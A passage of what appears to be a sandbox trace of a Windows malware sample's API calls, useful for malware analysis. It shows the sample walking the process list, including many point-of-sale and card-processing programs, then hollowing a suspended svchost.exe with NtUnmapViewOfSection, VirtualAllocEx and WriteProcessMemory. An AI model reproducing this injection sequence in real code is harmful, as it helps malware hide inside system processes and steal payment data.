(hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.684] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0185.685] lstrcmpA (lpString1="trillian.exe", lpString2="msedge.exe") returned 1 [0185.686] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.686] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0185.902] lstrcmpA (lpString1="webdrive.exe", lpString2="msedge.exe") returned 1 [0185.902] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.902] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0185.904] lstrcmpA (lpString1="whatsapp.exe", lpString2="msedge.exe") returned 1 [0185.904] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.904] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0185.906] lstrcmpA (lpString1="winscp.exe", lpString2="msedge.exe") returned 1 [0185.906] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.906] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0185.908] lstrcmpA (lpString1="active-charge.exe", lpString2="msedge.exe") returned -1 [0185.908] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.908] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0185.909] lstrcmpA (lpString1="yahoomessenger.exe", lpString2="msedge.exe") returned 1 [0185.910] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.910] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0185.911] lstrcmpA (lpString1="afr38.exe", lpString2="msedge.exe") returned -1 [0185.912] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.912] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0185.913] lstrcmpA (lpString1="accupos.exe", lpString2="msedge.exe") returned -1 [0185.913] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.914] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1100, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0185.915] lstrcmpA (lpString1="aldelo.exe", lpString2="msedge.exe") returned -1 [0185.915] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.915] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0185.920] lstrcmpA (lpString1="centralcreditcard.exe", lpString2="msedge.exe") returned -1 [0185.920] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.920] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x111c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0185.922] lstrcmpA (lpString1="ccv_server.exe", lpString2="msedge.exe") returned -1 [0185.922] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.922] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0185.923] lstrcmpA (lpString1="creditservice.exe", lpString2="msedge.exe") returned -1 [0185.924] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.924] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0185.925] lstrcmpA (lpString1="edcsvr.exe", lpString2="msedge.exe") returned -1 [0185.926] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.926] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0185.927] lstrcmpA (lpString1="fpos.exe", lpString2="msedge.exe") returned -1 [0185.927] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.927] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0185.929] lstrcmpA (lpString1="isspos.exe", lpString2="msedge.exe") returned -1 [0185.929] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.929] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0185.931] lstrcmpA (lpString1="mxslipstream.exe", lpString2="msedge.exe") returned 1 [0185.931] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.931] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0185.933] lstrcmpA (lpString1="omnipos.exe", lpString2="msedge.exe") returned 1 [0185.933] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.933] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0185.934] lstrcmpA (lpString1="spcwin.exe", lpString2="msedge.exe") returned 1 [0185.935] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.935] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0185.936] lstrcmpA (lpString1="spgagentservice.exe", lpString2="msedge.exe") returned 1 [0185.936] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.936] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0185.938] lstrcmpA (lpString1="utg2.exe", lpString2="msedge.exe") returned 1 [0185.938] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.939] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="seek.exe")) returned 1 [0186.113] lstrcmpA (lpString1="seek.exe", lpString2="msedge.exe") returned 1 [0186.114] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.114] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="responsenorth.exe")) returned 1 [0186.115] lstrcmpA (lpString1="responsenorth.exe", lpString2="msedge.exe") returned 1 [0186.115] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.115] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="nothing_him_doctor.exe")) returned 1 [0186.117] lstrcmpA (lpString1="nothing_him_doctor.exe", lpString2="msedge.exe") returned 1 [0186.117] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.117] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="must_dinner.exe")) returned 1 [0186.118] lstrcmpA (lpString1="must_dinner.exe", lpString2="msedge.exe") returned 1 [0186.118] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.118] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0186.120] lstrcmpA (lpString1="iexplore.exe", lpString2="msedge.exe") returned -1 [0186.120] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.120] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.122] lstrcmpA (lpString1="svchost.exe", lpString2="msedge.exe") returned 1 [0186.122] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.122] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x133c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0186.123] lstrcmpA (lpString1="backgroundTaskHost.exe", lpString2="msedge.exe") returned -1 [0186.124] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.124] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0186.125] lstrcmpA (lpString1="backgroundTaskHost.exe", lpString2="msedge.exe") returned -1 [0186.125] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.125] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="HxTsr.exe")) returned 1 [0186.126] lstrcmpA (lpString1="HxTsr.exe", lpString2="msedge.exe") returned -1 [0186.126] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.126] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0186.127] lstrcmpA (lpString1="UsoClient.exe", lpString2="msedge.exe") returned 1 [0186.128] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.128] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0186.129] lstrcmpA (lpString1="backgroundTaskHost.exe", lpString2="msedge.exe") returned -1 [0186.129] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.129] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1264, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0186.130] lstrcmpA (lpString1="audiodg.exe", lpString2="msedge.exe") returned -1 [0186.130] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.130] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe90, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0186.131] lstrcmpA (lpString1="conhost.exe", lpString2="msedge.exe") returned -1 [0186.131] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.131] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0186.133] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="msedge.exe") returned -1 [0186.133] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.133] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0186.134] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="msedge.exe") returned -1 [0186.134] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.134] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0186.135] lstrcmpA (lpString1="backgroundTaskHost.exe", lpString2="msedge.exe") returned -1 [0186.135] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.135] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0186.136] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="msedge.exe") returned -1 [0186.136] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.136] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0186.137] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="msedge.exe") returned -1 [0186.138] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.138] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0186.139] lstrcmpA (lpString1="dllhost.exe", lpString2="msedge.exe") returned -1 [0186.139] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.139] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0186.140] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="msedge.exe") returned -1 [0186.140] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.140] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0186.141] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="msedge.exe") returned -1 [0186.141] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.141] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0186.142] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="msedge.exe") returned -1 [0186.143] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.143] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0186.144] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="msedge.exe") returned -1 [0186.144] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.144] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0186.145] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="msedge.exe") returned -1 [0186.145] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.145] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0186.146] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="msedge.exe") returned -1 [0186.147] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.147] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0186.148] lstrcmpA (lpString1="dllhost.exe", lpString2="msedge.exe") returned -1 [0186.148] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0186.377] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5f842777, th32DefaultHeapID=0x0, th32ModuleID=0x8000a077, cntThreads=0x1, th32ParentProcessID=0x5ecd0000, pcPriClassBase=32764, dwFlags=0x14f198, szExeFile="")) returned 0 [0186.378] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0186.378] CloseHandle (hObject=0x648) returned 1 [0186.379] GetProcessHeap () returned 0x440000 [0186.379] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x104) returned 0x2087450 [0186.379] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetSystemWindowsDirectoryA") returned 0x7ffc5ed15f90 [0186.379] GetSystemWindowsDirectoryA (in: lpBuffer=0x2087450, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0186.380] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0186.380] lstrcatA (in: lpString1="C:\\Windows", lpString2="\\system32\\svchost.exe -k UnistackSvcGroup" | out: lpString1="C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup") returned="C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup" [0186.380] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateProcessA") returned 0x7ffc5ecf3600 [0186.380] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x80404, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x14fbc0*(cb=0x70, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14fc50 | out: lpCommandLine="C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup", lpProcessInformation=0x14fc50*(hProcess=0x1c0, hThread=0x648, dwProcessId=0x1c4, dwThreadId=0x254)) returned 1 [0186.398] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="NtQueryInformationProcess") returned 0x7ffc5f8b5060 [0186.399] NtQueryInformationProcess (in: ProcessHandle=0x1c0, ProcessInformationClass=0x0, ProcessInformation=0x14f290, ProcessInformationLength=0x30, ReturnLength=0x14f27c | out: ProcessInformation=0x14f290, ReturnLength=0x14f27c) returned 0x0 [0186.399] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0186.399] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x2d7000, lpBuffer=0x14f790, nSize=0x2c8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f790*, lpNumberOfBytesRead=0x0) returned 1 [0186.399] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="NtUnmapViewOfSection") returned 0x7ffc5f8b5280 [0186.400] NtUnmapViewOfSection (ProcessHandle=0x1c0, BaseAddress=0x7ff60e670000) returned 0x0 [0186.401] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="VirtualAllocEx") returned 0x7ffc5ecfa400 [0186.401] VirtualAllocEx (hProcess=0x1c0, lpAddress=0x7ff60e670000, dwSize=0x4a000, flAllocationType=0x3000, flProtect=0x40) returned 0x7ff60e670000 [0186.404] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0186.404] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e670000, lpBuffer=0x202b010*, nSize=0x400, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x202b010*, lpNumberOfBytesWritten=0x0) returned 1 [0186.416] GetProcAddress (hModule=0x7ffc5ecd0000, 